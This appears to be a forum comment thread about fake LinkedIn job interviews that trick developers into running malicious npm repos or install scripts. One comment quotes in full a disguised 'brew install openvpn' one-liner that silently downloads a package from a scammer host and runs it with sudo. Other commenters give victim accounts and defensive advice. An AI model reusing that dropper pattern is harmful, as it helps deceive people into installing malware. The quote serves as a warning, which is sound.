I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three have either security or stability issues, which seem to get worse, not better, as Microsoft goes further into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
They should have reported it for DMCA violation. It would be gone instantly.
They seem to be using the same domain for multiple targets; reddit thread from 3 months ago:
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with npm itself. This sort of scam would have worked with many different technologies, even a Makefile.
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet, like it is 1995, is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
> Downloading random unprotected scripts from the internet, like it is 1995, is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
Or running random curl | bash scripts from GitHub, AUR, NPM is just as bad, but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is, especially with all the mini-Shai-Huluds running around.
> Maybe Mac will finally get decent virtualization framework.
It already has; you can configure IntelliJ to run npm commands in a Docker container.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a Russian / east European accent.
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
You can actually test it yourself. The actual URL is in the post and the website is still up.
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Oh my goodness! I had this play out as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
Seen similar: https://www.theregister.com/security/2026/04/23/dev-targeted...
> but on a more tired or rushed day
This has nearly gotten me before, and I got lucky.
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Would highly recommend running any repo in an isolated environment like a vm
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
It would have been game over for me.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting into engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely; I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those who don't value it.
- Don't stay complacent; always innovate.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
the entire internet is just phishing at this point
More reasons for me to dislike linked-in. I have an account. I hate it.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents were as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
Yet another reason to be reluctant to even discuss linkedin job offers
now imagine if you were like the rest of us and didn’t write a blog post about it
I would not have found out about this. Thanks to the writer for taking the time.
Been going on for over half a decade
I think we need a different kind of PSA if it's still so new to people